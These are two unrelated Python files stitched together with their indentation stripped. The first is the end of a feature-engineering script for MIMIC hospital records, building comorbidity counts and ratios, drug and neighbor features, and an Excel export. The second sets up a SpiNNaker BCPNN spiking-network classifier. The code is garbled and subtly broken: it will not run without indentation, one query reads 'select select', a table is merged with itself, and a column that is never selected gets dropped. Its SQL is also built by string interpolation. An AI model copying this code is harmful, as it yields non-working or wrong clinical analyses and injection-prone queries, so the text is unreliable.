inpat_last_new = pd.pivot_table(inpat_last_new, values='icd9_code', index='subject_id', columns='Diagnosis', aggfunc=np.size,fill_value=0).reset_index()
### merging all the features created
inpat_final = inpat_totcom.merge(inpat_totcom, on='subject_id', how='outer').merge(inpat_totcom_yr, on='subject_id', how='outer').merge(inpat_proc, on='subject_id', how='outer').merge(inpat_totproc, on='subject_id', how='outer').merge(inpat_visit, on='subject_id', how='outer').merge(inpat_diagnosis, on='subject_id', how='outer').merge(inpat_los,on='subject_id',how='outer').merge(inpat_last_new,on='subject_id',how='outer')
##add inpatient flag
inpat_final['io_flag'] = 'in'
# Procedures processing
print("\nFeature Creation: Procedure related features")
#merge with admissions for relevant hadm_id
proc = pd.merge(procedures, admission[['hadm_id','admittime','dischtime','visit_year']])
proc['visit_year'] = proc.visit_year.astype(str)
#consider procedures carried out in 2008, 2009 & 2010 only
proc = proc.loc[proc.visit_year.isin(['2008','2009','2010']),]
#add the reporting summary & reporting label details
proc_report_details = execute_sql('select * from mimic_d_icd9_proc_reference')
proc = pd.merge(proc, proc_report_details[['icd9_proc', 'icd9_proc_report_summ', 'icd9_proc_report_label']], left_on='icd9_procedure', right_on='icd9_proc')
#pivoting dataset in the required format
proc_final = pd.pivot_table(proc, values='icd9_procedure', index='subject_id', columns=['visit_year', 'icd9_proc_report_summ', 'icd9_proc_report_label'], aggfunc=np.size,fill_value=0)
#flatten multiindex column names
proc_final.columns = ['_'.join(col).strip() for col in proc_final.columns]
proc_final = proc_final.reset_index()
#### meging with inpatient set above
inpat_final = pd.merge(inpat_final,proc_final, on='subject_id', how='left')
return(inpat_final)
#%% derived features based on features summary
def derived_summary_features(inpat_final):
print("\nFeature Creation: Summarised features")
inpat_final['NoOfCom_14_2008'] = inpat_final[["ALZHDMTA_Count_2008","CHF_Count_2008","CHRNKIDN_Count_2008","COPD_Count_2008","DEPRESSN_Count_2008","DIABETES_Count_2008","ISCHMCHT_Count_2008","OSTEOPRS_Count_2008","RA_OA_Count_2008","STRKETIA_Count_2008","CNCR_BRST_Count_2008","CNCR_COLR_Count_2008","CNCR_PROS_Count_2008","CNCR_LUNG_Count_2008"]].sum(axis=1)
inpat_final['NoOfCom_14_2009'] = inpat_final[["ALZHDMTA_Count_2009","CHF_Count_2009","CHRNKIDN_Count_2009","COPD_Count_2009","DEPRESSN_Count_2009","DIABETES_Count_2009","ISCHMCHT_Count_2009","OSTEOPRS_Count_2009","RA_OA_Count_2009","STRKETIA_Count_2009","CNCR_BRST_Count_2009","CNCR_COLR_Count_2009","CNCR_PROS_Count_2009","CNCR_LUNG_Count_2009"]].sum(axis=1)
inpat_final['NoOfCom_14_2010'] = inpat_final[["ALZHDMTA_Count_2010","CHF_Count_2010","CHRNKIDN_Count_2010","COPD_Count_2010","DEPRESSN_Count_2010","DIABETES_Count_2010","ISCHMCHT_Count_2010","OSTEOPRS_Count_2010","RA_OA_Count_2010","STRKETIA_Count_2010","CNCR_BRST_Count_2010","CNCR_COLR_Count_2010","CNCR_PROS_Count_2010","CNCR_LUNG_Count_2010"]].sum(axis=1)
inpat_final['Total_Comorb_14'] = inpat_final[["NoOfCom_14_2008", "NoOfCom_14_2009", "NoOfCom_14_2010"]].sum(axis=1)
inpat_final['Total_Comorb_14_0809'] = inpat_final[["NoOfCom_14_2008","NoOfCom_14_2009"]].sum(axis=1)
### ALZHDMTA ###
inpat_final['ALZHDMTA_Prc_Dstrb_2008'] = inpat_final.ALZHDMTA_Count_2008/inpat_final.NoOfCom_14_2008
inpat_final['ALZHDMTA_Prc_Dstrb_2009'] = inpat_final.ALZHDMTA_Count_2009/inpat_final.NoOfCom_14_2009
inpat_final['ALZHDMTA_Prc_Dstrb_2010'] = inpat_final.ALZHDMTA_Count_2010/inpat_final.NoOfCom_14_2010
inpat_final['ALZHDMTA_Count_2008_2009'] = inpat_final[["ALZHDMTA_Count_2008","ALZHDMTA_Count_2009"]].sum(axis=1)
inpat_final['ALZHDMTA_Prc_2008_2009'] = inpat_final.ALZHDMTA_Count_2008_2009/inpat_final.Total_Comorb_14_0809
inpat_final['ALZHDMTA_Count_2008_2010'] = inpat_final[["ALZHDMTA_Count_2008","ALZHDMTA_Count_2009","ALZHDMTA_Count_2010"]].sum(axis=1)
inpat_final['ALZHDMTA_Prc_2008_2010'] = inpat_final.ALZHDMTA_Count_2008_2010/inpat_final.Total_Comorb_14
### CHF ###
inpat_final['CHF_Prc_Dstrb_2008'] = inpat_final.CHF_Count_2008/inpat_final.NoOfCom_14_2008
inpat_final['CHF_Prc_Dstrb_2009'] = inpat_final.CHF_Count_2009/inpat_final.NoOfCom_14_2009
inpat_final['CHF_Prc_Dstrb_2010'] = inpat_final.CHF_Count_2010/inpat_final.NoOfCom_14_2010
inpat_final['CHF_Count_2008_2009'] = inpat_final[["CHF_Count_2008","CHF_Count_2009"]].sum(axis=1)
inpat_final['CHF_Prc_2008_2009'] = inpat_final.CHF_Count_2008_2009/inpat_final.Total_Comorb_14_0809
inpat_final['CHF_Count_2008_2010'] = inpat_final[["CHF_Count_2008","CHF_Count_2009","CHF_Count_2010"]].sum(axis=1)
inpat_final['CHF_Prc_2008_2010'] = inpat_final.CHF_Count_2008_2010/inpat_final.Total_Comorb_14
### CHRNKIDN ###
inpat_final['CHRNKIDN_Prc_Dstrb_2008'] = inpat_final.CHRNKIDN_Count_2008/inpat_final.NoOfCom_14_2008
inpat_final['CHRNKIDN_Prc_Dstrb_2009'] = inpat_final.CHRNKIDN_Count_2009/inpat_final.NoOfCom_14_2009
inpat_final['CHRNKIDN_Prc_Dstrb_2010'] = inpat_final.CHRNKIDN_Count_2010/inpat_final.NoOfCom_14_2010
inpat_final['CHRNKIDN_Count_2008_2009'] = inpat_final[["CHRNKIDN_Count_2008","CHRNKIDN_Count_2009"]].sum(axis=1)
inpat_final['CHRNKIDN_Prc_2008_2009'] = inpat_final.CHRNKIDN_Count_2008_2009/inpat_final.Total_Comorb_14_0809
inpat_final['CHRNKIDN_Count_2008_2010'] = inpat_final[["CHRNKIDN_Count_2008","CHRNKIDN_Count_2009","CHRNKIDN_Count_2010"]].sum(axis=1)
inpat_final['CHRNKIDN_Prc_2008_2010'] = inpat_final.CHRNKIDN_Count_2008_2010/inpat_final.Total_Comorb_14
### COPD ###
inpat_final['COPD_Prc_Dstrb_2008'] = inpat_final.COPD_Count_2008/inpat_final.NoOfCom_14_2008
inpat_final['COPD_Prc_Dstrb_2009'] = inpat_final.COPD_Count_2009/inpat_final.NoOfCom_14_2009
inpat_final['COPD_Prc_Dstrb_2010'] = inpat_final.COPD_Count_2010/inpat_final.NoOfCom_14_2010
inpat_final['COPD_Count_2008_2009'] = inpat_final[["COPD_Count_2008","COPD_Count_2009"]].sum(axis=1)
inpat_final['COPD_Prc_2008_2009'] = inpat_final.COPD_Count_2008_2009/inpat_final.Total_Comorb_14_0809
inpat_final['COPD_Count_2008_2010'] = inpat_final[["COPD_Count_2008","COPD_Count_2009","COPD_Count_2010"]].sum(axis=1)
inpat_final['COPD_Prc_2008_2010'] = inpat_final.COPD_Count_2008_2010/inpat_final.Total_Comorb_14
### DEPRESSN ###
inpat_final['DEPRESSN_Prc_Dstrb_2008'] = inpat_final.DEPRESSN_Count_2008/inpat_final.NoOfCom_14_2008
inpat_final['DEPRESSN_Prc_Dstrb_2009'] = inpat_final.DEPRESSN_Count_2009/inpat_final.NoOfCom_14_2009
inpat_final['DEPRESSN_Prc_Dstrb_2010'] = inpat_final.DEPRESSN_Count_2010/inpat_final.NoOfCom_14_2010
inpat_final['DEPRESSN_Count_2008_2009'] = inpat_final[["DEPRESSN_Count_2008","DEPRESSN_Count_2009"]].sum(axis=1)
inpat_final['DEPRESSN_Prc_2008_2009'] = inpat_final.DEPRESSN_Count_2008_2009/inpat_final.Total_Comorb_14_0809
inpat_final['DEPRESSN_Count_2008_2010'] = inpat_final[["DEPRESSN_Count_2008","DEPRESSN_Count_2009","DEPRESSN_Count_2010"]].sum(axis=1)
inpat_final['DEPRESSN_Prc_2008_2010'] = inpat_final.DEPRESSN_Count_2008_2010/inpat_final.Total_Comorb_14
### DIABETES ###
inpat_final['DIABETES_Prc_Dstrb_2008'] = inpat_final.DIABETES_Count_2008/inpat_final.NoOfCom_14_2008
inpat_final['DIABETES_Prc_Dstrb_2009'] = inpat_final.DIABETES_Count_2009/inpat_final.NoOfCom_14_2009
inpat_final['DIABETES_Prc_Dstrb_2010'] = inpat_final.DIABETES_Count_2010/inpat_final.NoOfCom_14_2010
inpat_final['DIABETES_Count_2008_2009'] = inpat_final[["DIABETES_Count_2008","DIABETES_Count_2009"]].sum(axis=1)
inpat_final['DIABETES_Prc_2008_2009'] = inpat_final.DIABETES_Count_2008_2009/inpat_final.Total_Comorb_14_0809
inpat_final['DIABETES_Count_2008_2010'] = inpat_final[["DIABETES_Count_2008","DIABETES_Count_2009","DIABETES_Count_2010"]].sum(axis=1)
inpat_final['DIABETES_Prc_2008_2010'] = inpat_final.DIABETES_Count_2008_2010/inpat_final.Total_Comorb_14
### ISCHMCHT ###
inpat_final['ISCHMCHT_Prc_Dstrb_2008'] = inpat_final.ISCHMCHT_Count_2008/inpat_final.NoOfCom_14_2008
inpat_final['ISCHMCHT_Prc_Dstrb_2009'] = inpat_final.ISCHMCHT_Count_2009/inpat_final.NoOfCom_14_2009
inpat_final['ISCHMCHT_Prc_Dstrb_2010'] = inpat_final.ISCHMCHT_Count_2010/inpat_final.NoOfCom_14_2010
inpat_final['ISCHMCHT_Count_2008_2009'] = inpat_final[["ISCHMCHT_Count_2008","ISCHMCHT_Count_2009"]].sum(axis=1)
inpat_final['ISCHMCHT_Prc_2008_2009'] = inpat_final.ISCHMCHT_Count_2008_2009/inpat_final.Total_Comorb_14_0809
inpat_final['ISCHMCHT_Count_2008_2010'] = inpat_final[["ISCHMCHT_Count_2008","ISCHMCHT_Count_2009","ISCHMCHT_Count_2010"]].sum(axis=1)
inpat_final['ISCHMCHT_Prc_2008_2010'] = inpat_final.ISCHMCHT_Count_2008_2010/inpat_final.Total_Comorb_14
### OSTEOPRS ###
inpat_final['OSTEOPRS_Prc_Dstrb_2008'] = inpat_final.OSTEOPRS_Count_2008/inpat_final.NoOfCom_14_2008
inpat_final['OSTEOPRS_Prc_Dstrb_2009'] = inpat_final.OSTEOPRS_Count_2009/inpat_final.NoOfCom_14_2009
inpat_final['OSTEOPRS_Prc_Dstrb_2010'] = inpat_final.OSTEOPRS_Count_2010/inpat_final.NoOfCom_14_2010
inpat_final['OSTEOPRS_Count_2008_2009'] = inpat_final[["OSTEOPRS_Count_2008","OSTEOPRS_Count_2009"]].sum(axis=1)
inpat_final['OSTEOPRS_Prc_2008_2009'] = inpat_final.OSTEOPRS_Count_2008_2009/inpat_final.Total_Comorb_14_0809
inpat_final['OSTEOPRS_Count_2008_2010'] = inpat_final[["OSTEOPRS_Count_2008","OSTEOPRS_Count_2009","OSTEOPRS_Count_2010"]].sum(axis=1)
inpat_final['OSTEOPRS_Prc_2008_2010'] = inpat_final.OSTEOPRS_Count_2008_2010/inpat_final.Total_Comorb_14
### RA_OA ###
inpat_final['RA_OA_Prc_Dstrb_2008'] = inpat_final.RA_OA_Count_2008/inpat_final.NoOfCom_14_2008
inpat_final['RA_OA_Prc_Dstrb_2009'] = inpat_final.RA_OA_Count_2009/inpat_final.NoOfCom_14_2009
inpat_final['RA_OA_Prc_Dstrb_2010'] = inpat_final.RA_OA_Count_2010/inpat_final.NoOfCom_14_2010
inpat_final['RA_OA_Count_2008_2009'] = inpat_final[["RA_OA_Count_2008","RA_OA_Count_2009"]].sum(axis=1)
inpat_final['RA_OA_Prc_2008_2009'] = inpat_final.RA_OA_Count_2008_2009/inpat_final.Total_Comorb_14_0809
inpat_final['RA_OA_Count_2008_2010'] = inpat_final[["RA_OA_Count_2008","RA_OA_Count_2009","RA_OA_Count_2010"]].sum(axis=1)
inpat_final['RA_OA_Prc_2008_2010'] = inpat_final.RA_OA_Count_2008_2010/inpat_final.Total_Comorb_14
### STRKETIA ###
inpat_final['STRKETIA_Prc_Dstrb_2008'] = inpat_final.STRKETIA_Count_2008/inpat_final.NoOfCom_14_2008
inpat_final['STRKETIA_Prc_Dstrb_2009'] = inpat_final.STRKETIA_Count_2009/inpat_final.NoOfCom_14_2009
inpat_final['STRKETIA_Prc_Dstrb_2010'] = inpat_final.STRKETIA_Count_2010/inpat_final.NoOfCom_14_2010
inpat_final['STRKETIA_Count_2008_2009'] = inpat_final[["STRKETIA_Count_2008","STRKETIA_Count_2009"]].sum(axis=1)
inpat_final['STRKETIA_Prc_2008_2009'] = inpat_final.STRKETIA_Count_2008_2009/inpat_final.Total_Comorb_14_0809
inpat_final['STRKETIA_Count_2008_2010'] = inpat_final[["STRKETIA_Count_2008","STRKETIA_Count_2009","STRKETIA_Count_2010"]].sum(axis=1)
inpat_final['STRKETIA_Prc_2008_2010'] = inpat_final.STRKETIA_Count_2008_2010/inpat_final.Total_Comorb_14
### CNCR_BRST ###
inpat_final['CNCR_BRST_Prc_Dstrb_2008'] = inpat_final.CNCR_BRST_Count_2008/inpat_final.NoOfCom_14_2008
inpat_final['CNCR_BRST_Prc_Dstrb_2009'] = inpat_final.CNCR_BRST_Count_2009/inpat_final.NoOfCom_14_2009
inpat_final['CNCR_BRST_Prc_Dstrb_2010'] = inpat_final.CNCR_BRST_Count_2010/inpat_final.NoOfCom_14_2010
inpat_final['CNCR_BRST_Count_2008_2009'] = inpat_final[["CNCR_BRST_Count_2008","CNCR_BRST_Count_2009"]].sum(axis=1)
inpat_final['CNCR_BRST_Prc_2008_2009'] = inpat_final.CNCR_BRST_Count_2008_2009/inpat_final.Total_Comorb_14_0809
inpat_final['CNCR_BRST_Count_2008_2010'] = inpat_final[["CNCR_BRST_Count_2008","CNCR_BRST_Count_2009","CNCR_BRST_Count_2010"]].sum(axis=1)
inpat_final['CNCR_BRST_Prc_2008_2010'] = inpat_final.CNCR_BRST_Count_2008_2010/inpat_final.Total_Comorb_14
### CNCR_COLR ###
inpat_final['CNCR_COLR_Prc_Dstrb_2008'] = inpat_final.CNCR_COLR_Count_2008/inpat_final.NoOfCom_14_2008
inpat_final['CNCR_COLR_Prc_Dstrb_2009'] = inpat_final.CNCR_COLR_Count_2009/inpat_final.NoOfCom_14_2009
inpat_final['CNCR_COLR_Prc_Dstrb_2010'] = inpat_final.CNCR_COLR_Count_2010/inpat_final.NoOfCom_14_2010
inpat_final['CNCR_COLR_Count_2008_2009'] = inpat_final[["CNCR_COLR_Count_2008","CNCR_COLR_Count_2009"]].sum(axis=1)
inpat_final['CNCR_COLR_Prc_2008_2009'] = inpat_final.CNCR_COLR_Count_2008_2009/inpat_final.Total_Comorb_14_0809
inpat_final['CNCR_COLR_Count_2008_2010'] = inpat_final[["CNCR_COLR_Count_2008","CNCR_COLR_Count_2009","CNCR_COLR_Count_2010"]].sum(axis=1)
inpat_final['CNCR_COLR_Prc_2008_2010'] = inpat_final.CNCR_COLR_Count_2008_2010/inpat_final.Total_Comorb_14
### CNCR_PROS ###
inpat_final['CNCR_PROS_Prc_Dstrb_2008'] = inpat_final.CNCR_PROS_Count_2008/inpat_final.NoOfCom_14_2008
inpat_final['CNCR_PROS_Prc_Dstrb_2009'] = inpat_final.CNCR_PROS_Count_2009/inpat_final.NoOfCom_14_2009
inpat_final['CNCR_PROS_Prc_Dstrb_2010'] = inpat_final.CNCR_PROS_Count_2010/inpat_final.NoOfCom_14_2010
inpat_final['CNCR_PROS_Count_2008_2009'] = inpat_final[["CNCR_PROS_Count_2008","CNCR_PROS_Count_2009"]].sum(axis=1)
inpat_final['CNCR_PROS_Prc_2008_2009'] = inpat_final.CNCR_PROS_Count_2008_2009/inpat_final.Total_Comorb_14_0809
inpat_final['CNCR_PROS_Count_2008_2010'] = inpat_final[["CNCR_PROS_Count_2008","CNCR_PROS_Count_2009","CNCR_PROS_Count_2010"]].sum(axis=1)
inpat_final['CNCR_PROS_Prc_2008_2010'] = inpat_final.CNCR_PROS_Count_2008_2010/inpat_final.Total_Comorb_14
### CNCR_LUNG ###
inpat_final['CNCR_LUNG_Prc_Dstrb_2008'] = inpat_final.CNCR_LUNG_Count_2008/inpat_final.NoOfCom_14_2008
inpat_final['CNCR_LUNG_Prc_Dstrb_2009'] = inpat_final.CNCR_LUNG_Count_2009/inpat_final.NoOfCom_14_2009
inpat_final['CNCR_LUNG_Prc_Dstrb_2010'] = inpat_final.CNCR_LUNG_Count_2010/inpat_final.NoOfCom_14_2010
inpat_final['CNCR_LUNG_Count_2008_2009'] = inpat_final[["CNCR_LUNG_Count_2008","CNCR_LUNG_Count_2009"]].sum(axis=1)
inpat_final['CNCR_LUNG_Prc_2008_2009'] = inpat_final.CNCR_LUNG_Count_2008_2009/inpat_final.Total_Comorb_14_0809
inpat_final['CNCR_LUNG_Count_2008_2010'] = inpat_final[["CNCR_LUNG_Count_2008","CNCR_LUNG_Count_2009","CNCR_LUNG_Count_2010"]].sum(axis=1)
inpat_final['CNCR_LUNG_Prc_2008_2010'] = inpat_final.CNCR_LUNG_Count_2008_2010/inpat_final.Total_Comorb_14
return(inpat_final)
#%% add labels to the columns required (note: for diagnosis it adds ccs label)
def labels_for_neighbor_features(df, col):
idx_list = []
ndc_list = []
lab_list = []
for i, row in df.iterrows():
if row[col].split('_')[0] == 'IDX':
idx_list.append(row[col])
elif row[col].split('_')[0] == 'N':
ndc_list.append(row[col])
elif row[col].split('_')[0] == 'L':
lab_list.append(row[col])
# intialize empty dataframes
idx_df = pd.DataFrame()
ndc_df = pd.DataFrame()
lab_df = pd.DataFrame()
if len(idx_list) > 0:
# get labels for diagnosis(IDX)
idx_list = pd.DataFrame(idx_list, columns=['code_id'])
idx_list['code'] = idx_list['code_id'].str.split('_').str[1]
idx_list = idx_list.drop_duplicates()
idx_df = pd.merge(idx_list, hcup_df[['icd9_std', 'hcup_label']], how='left', left_on='code', right_on='icd9_std')
idx_df = idx_df.drop('icd9_std', 1)
idx_df.columns = ['code_id', 'code', 'label']
if len(ndc_list) > 0:
# get labels for drugs(NDC)
ndc_list = pd.DataFrame(ndc_list, columns=['code_id'])
ndc_list['code'] = ndc_list['code_id'].str.split('_').str[1]
ndc_list = ndc_list.drop_duplicates()
ndc_sql_list = str(list(ndc_list.code)).strip('[]')
ndc_db = execute_sql("select ndc as code, pref_label as label from d_ndc_codes where ndc in (%s)" %(ndc_sql_list))
ndc_df = pd.merge(ndc_list, ndc_db, how='left', on='code')
if len(lab_list) > 0:
# get labels for labs(LAB)
lab_list = pd.DataFrame(lab_list, columns=['code_id'])
lab_list['code'] = lab_list['code_id'].str.split('_').str[1]
lab_list = lab_list.drop_duplicates()
lab_sql_list = str(list(lab_list.code)).strip('[]')
lab_db = execute_sql("select loinc_code as code, loinc_label as label from d_loinc_codes where loinc_code in (%s)" %(lab_sql_list))
lab_db = lab_db.drop_duplicates(subset='code')
lab_df = pd.merge(lab_list, lab_db, how='left', on='code')
#append all list to get the label list
label_df = pd.concat([idx_df, ndc_df, lab_df])
label_df = label_df.drop('code',1)
label_df.columns = [col, col+'_label']
# merge with original dataset
df = pd.merge(df, label_df, how='left', on=col)
return(df)
#%% Neighbor Features Creation
def neighbor_features(patient_id=None):
if patient_id:
patient_id = str(patient_id).strip('[]')
dashbd = execute_sql("select patient_id, pair_l1, pair_l2, neighbor_code, neighbor_pref_name, score from dashbd_final where patient_id in (%s)" %(patient_id))
else:
dashbd = execute_sql("select select patient_id, pair_l1, pair_l2, neighbor_code, neighbor_pref_name, score from dashbd_final")
dashbd = dashbd.drop(['top_n'], axis=1)
dashbd = dashbd.drop_duplicates()
# extract top 50 for every patient
dashbd = dashbd.sort_values(['score'], ascending=False)
dashbd = dashbd.groupby('patient_id').apply(lambda x: x.head(50)).reset_index(drop=True)
# add labels for columns required
dashbd = labels_for_neighbor_features(dashbd, 'pair_l1')
dashbd = labels_for_neighbor_features(dashbd, 'pair_l2')
# add new column as neighbor feature
dashbd['feature'] = dashbd['pair_l1_label'] + '_' + dashbd['pair_l2_label'] + '_' + dashbd['neighbor_pref_name']
dashbd['feature'] = dashbd['feature'].fillna('NOTFOUND')
#pivot data to get data at patient level
dashbd_nf = pd.pivot_table(dashbd, values='score', index='patient_id', columns='feature', aggfunc='last', fill_value=0).reset_index()
# rename column as hcup_label
dashbd_nf.rename(columns={'patient_id':'subject_id'}, inplace=True)
return(dashbd_nf)
#%%# main function
if __name__ == "__main__":
print("\nExtracting the admissions, diagnoses & procedures dataset...")
# admission dataset
admission = execute_sql("select * from mimic_admissions_shftd")
# remove Records with NA in dischtime
admission = admission.dropna(subset=['dischtime'])
# add visit_year column
admission['visit_year'] = admission['admittime'].dt.year
# diagnosis dataset
diagnosis = execute_sql("select a.*, b.long_title, b.icd9_std from mimic_diagnoses a, d_icd9_diagnoses b where a.icd9_code = b.icd9_code")
# procedures dataset
procedures = execute_sql('select a.*, b.long_title from mimic_procedures a, mimic_d_icd_procedures b where a.icd9_procedure = b.icd9_procedure')
# master_icd9
MASTER_icd9 = master_icd9()
#feature creation
inpat_features = feature_creation(admission, diagnosis, procedures, MASTER_icd9)
#calculating & adding summarised features
mimic_summary = derived_summary_features(inpat_features)
# hcup dataset and processing
hcup = execute_sql('select icd9_code, long_title, icd9_std, ccs_lvl_1_label, ccs_lvl_2_label, ccs_lvl_3_label, ccs_lvl_4_label from d_icd9_diagnoses') #(01/24/18) icd9code '388' was present in mimic_d_icd_diagnoses & not in d_icd9_diagnoses
hcup_melt = pd.melt(hcup, id_vars=['icd9_code', 'long_title', 'icd9_std'], var_name='col_name')
hcup_melt = hcup_melt.loc[hcup_melt['value']!=' ',]
hcup_melt['level_id'] = hcup_melt['col_name'].str.split('_').str[2]
hcup_melt = hcup_melt.sort_values(['icd9_code','icd9_std','level_id'], ascending=[True,True,False])
hcup_df = hcup_melt.groupby(by=['icd9_code', 'icd9_std']).apply(lambda g: g[g['level_id'] == g['level_id'].max()]).reset_index(drop=True)
hcup_df = hcup_df.drop(['level_id', 'col_name'],1)
# rename column as hcup_label
hcup_df.rename(columns={'value':'hcup_label'}, inplace=True)
#configure icd9 code for the match
hcup_df = configure_icd9_codes(hcup_df, 'icd9_std', 'icd9_to_compare')
#the new drug features (added on 01/08/2018)
pres = execute_sql("select * from mimic_prescriptions where drug_type='MAIN' and ndc<>'0'")
pres_unique = pres[['drug']].drop_duplicates()
inpat_pres = pd.DataFrame(columns=['subject_id'])
for i, row in pres_unique[:10].iterrows():
pres_data = pres.loc[pres.drug == row.drug,]
adm_data = admission.loc[admission.hadm_id.isin(pres_data.hadm_id),]
inpat_pres_temp = drug_summary(pres_data, row.drug, adm_data, hcup_df)
inpat_pres = inpat_pres.merge(inpat_pres_temp,on='subject_id',how='outer')
#### meging with summary dataset above
mimic_summary = pd.merge(mimic_summary, inpat_pres, on='subject_id', how='left')
# the new neighbor feature, for specific patients add list, else leave empty
mimic_neighbor = neighbor_features()
# merging with the summary
mimic_summary = pd.merge(mimic_summary, mimic_neighbor, on='subject_id', how='left')
#write output to a spreadsheet
print("\nGenerating the spreadsheet - mimic_all_patients.xlsx")
writer = pd.ExcelWriter("mimic_all_patients.xlsx", engine='xlsxwriter')
mimic_summary.to_excel(writer, sheet_name='mimic_all_patients')
writer.save()
|
import itertools
import logging
import numpy
import pylab
# Import simulator
import pynn_spinnaker as sim
import pynn_spinnaker_bcpnn as bcpnn
from copy import deepcopy
logger = logging.getLogger("pynn_spinnaker")
logger.setLevel(logging.INFO)
logger.addHandler(logging.StreamHandler())
#-------------------------------------------------------------------
# General Parameters
#-------------------------------------------------------------------
# Network dimensions
INPUT_NAMES = ["X", "Y"]
CLASS_NAMES = ["X'", "Y'"]
CLASS_POP_SIZE = 30
WEIGHT_GAIN = 6.0
# Weight of connection between stimuli input and class and input populations
PRE_STIMULI_WEIGHT = 2.0
POST_STIMULI_WEIGHT = 2.0
# Firing frequency that corresponds to certainty
MAX_FREQUENCY = 20.0 # Hz
MIN_FREQUENCY = 0.001
#-------------------------------------------------------------------
# Training parameters
#-------------------------------------------------------------------
# Experiment configuration
TRAINING_TIME = 20 * 1000
TRAINING_STIMULUS_TIME = 100
BCPNN_TAU_PRIMARY = 10.0 # ms
BCPNN_TAU_ELIGIBILITY = 1000.0 # ms
BCPNN_PHI = 0.045 # nA
# Maximum weight multiplied by Wij value calculated by BCPNN rule
BCPNN_MAX_WEIGHT = 0.012 # uS for conductance
#-------------------------------------------------------------------
# Testing parameters
#-------------------------------------------------------------------
TESTING_STIMULUS_TIME = 5000
TESTING_TIME = 4 * TESTING_STIMULUS_TIME
cell_params = {
'cm' : 0.25, # nF
'tau_m' : 20.0,
'tau_refrac': 2.0,
'tau_syn_E' : 5.0,
'tau_syn_I' : 5.0,
'v_reset' : -70.0,
'v_rest' : -70.0,
'v_thresh' : -55.0
}
#-------------------------------------------------------------------
# Generate poisson noise of given rate between start and stop times
#-------------------------------------------------------------------
def poisson_generator(rate, t_start, t_stop):
n = (t_stop - t_start) / 1000.0 * rate
number = numpy.ceil(n + 3 * numpy.sqrt(n))
if number < 100:
number = min(5 + numpy.ceil(2 * n),100)
if number > 0:
isi = numpy.random.exponential(1.0/rate, number)*1000.0
if number > 1:
spikes = numpy.add.accumulate(isi)
else:
spikes = isi
else:
spikes = numpy.array([])
spikes += t_start
i = numpy.searchsorted(spikes, t_stop)
extra_spikes = []
if len(spikes) == i:
# ISI buf overrun
t_last = spikes[-1] + numpy.random.exponential(1.0 / rate, 1)[0] * 1000.0
while (t_last<t_stop):
extra_spikes.append(t_last)
t_last += numpy.random.exponential(1.0 / rate, 1)[0] * 1000.0
spikes = numpy.concatenate((spikes, extra_spikes))
else:
spikes = numpy.resize(spikes,(i,))
# Return spike times, rounded to millisecond boundaries
return [round(x) for x in spikes]
#-------------------------------------------------------------------
# Convert weights in format returned by getWeights into a connection list
# **NOTE** this requires signed weight support
#-------------------------------------------------------------------
# Convert weights in format returned by getWeights into a connection list
def convert_weights_to_list(matrix, delay, weight_scale=1.0):
def build_list(indices):
# Extract weights from matrix using indices
weights = matrix[indices]
# Scale weights
weights = numpy.multiply(weights, weight_scale)
# Build numpy array of delays
delays = numpy.repeat(delay, len(weights))
# Zip x-y coordinates of non-zero weights with weights and delays
return zip(indices[0], indices[1], weights, delays)
# Get indices of non-nan i.e. connected weights
connected_indices = numpy.where(~numpy.isnan(matrix))
# Return connection lists
return build_list(connected_indices)
#-------------------------------------------------------------------
# Convert list of stimuli rates and a duration into blocks of
# Poisson noise in format to load into spike source array
#-------------------------------------------------------------------
def generate_stimuli_spike_times(stimuli_rates, stimuli_duration, population_size):
# Build spike source array format spike trains for each neuron in population
population_spike_times = []
for n in range(population_size):
# Loop through all stimuli and add poisson noise to this neuron's spike times
neuron_spike_times = []
for i, r in enumerate(stimuli_rates):
start_time = i * stimuli_duration
end_time = start_time + stimuli_duration
neuron_spike_times.extend(poisson_generator(r, start_time, end_time))
# Add neuron spike times to population
population_spike_times.append(neuron_spike_times)
return population_spike_times
def create_input_population(size, name, record, sim):
# Population parameters
p = sim.Population(size, sim.IF_curr_exp(**cell_params), label=name)
if record:
# **YUCK** record spikes actually entirely ignores
# sampling interval but throws exception if it is not set
p.record("spikes", sampling_interval=100.0)
return p
def create_class_population(size, name, record, ioffset, train, sim):
params = deepcopy(cell_params)
params["bias_enabled"] = False
params["plasticity_enabled"] = train
params["i_offset"] = ioffset
# Population parameters
p = sim.Population(size, bcpnn.IF_curr_exp(**params), label=name)
if record:
# **YUCK** record spikes actually entirely ignores
# sampling interval but throws exception if it is not set
p.record("spikes", sampling_interval=100.0)
if train:
p.record("bias", sampling_interval=100.0)
return p
#-------------------------------------------------------------------
# Build basic classifier network
#-------------------------------------------------------------------
def build_basic_network(input_stimuli_rates, input_stimuli_duration,
class_stimuli_rates, class_stimuli_duration,
record, ioffset, train, sim):
# Create main input and class populations
input_populations = [create_input_population(CLASS_POP_SIZE, i, record, sim) for i in INPUT_NAMES]
if isinstance(ioffset, list):
class_populations = [create_class_population(CLASS_POP_SIZE, c, record, o, train, sim) for i, (o, c) in enumerate(zip(ioffset, CLASS_NAMES))]
else:
print ioffset
class_populations = [create_class_population(CLASS_POP_SIZE, c, record, ioffset, train, sim) for c in CLASS_NAMES]
# Create pre-synaptic stimuli populations
pre_stimuli_connector = sim.OneToOneConnector()
pre_stimuli_synapse = sim.StaticSynapse(weight=PRE_STIMULI_WEIGHT)
for i, (rate, input_pop) in enumerate(zip(input_stimuli_rates, input_populations)):
# Convert stimuli into spike times
spike_times = generate_stimuli_spike_times(rate, input_stimuli_duration, CLASS_POP_SIZE)
# Build spike source array with these times
stim_pop = sim.Population(CLASS_POP_SIZE, sim.SpikeSourceArray(spike_times=spike_times),
label="pre_stimuli_%u" % i)
# Connect spike source to input
sim.Projection(stim_pop, input_pop, pre_stimuli_connector, pre_stimuli_synapse, receptor_type="excitatory",
label="%s-%s" % (stim_pop.label, input_pop.label))
# Create training spike source array populations
post_stimuli_connector = sim.OneToOneConnector()
post_stimuli_synapse = sim.StaticSynapse(weight=POST_STIMULI_WEIGHT)
for i, (rate, class_pop) in enumerate(zip(class_stimuli_rates, class_populations)):
# Convert stimuli into spike times
spike_times = generate_stimuli_spike_times(rate, class_stimuli_duration, CLASS_POP_SIZE)
# Build spike source array with these times
stim_pop = sim.Population(CLASS_POP_SIZE, sim.SpikeSourceArray, {"spike_times": spike_times},
label="post_stimuli_%u" % i)
# Connect spike source to input
sim.Projection(stim_pop, class_pop, post_stimuli_connector, post_stimuli_synapse, receptor_type="excitatory",
label="%s-%s" % (stim_pop.label, class_pop.label))
# Return created populations
return input_populations, class_populations
#-------------------------------------------------------------------
# Train network and return weights
#-------------------------------------------------------------------
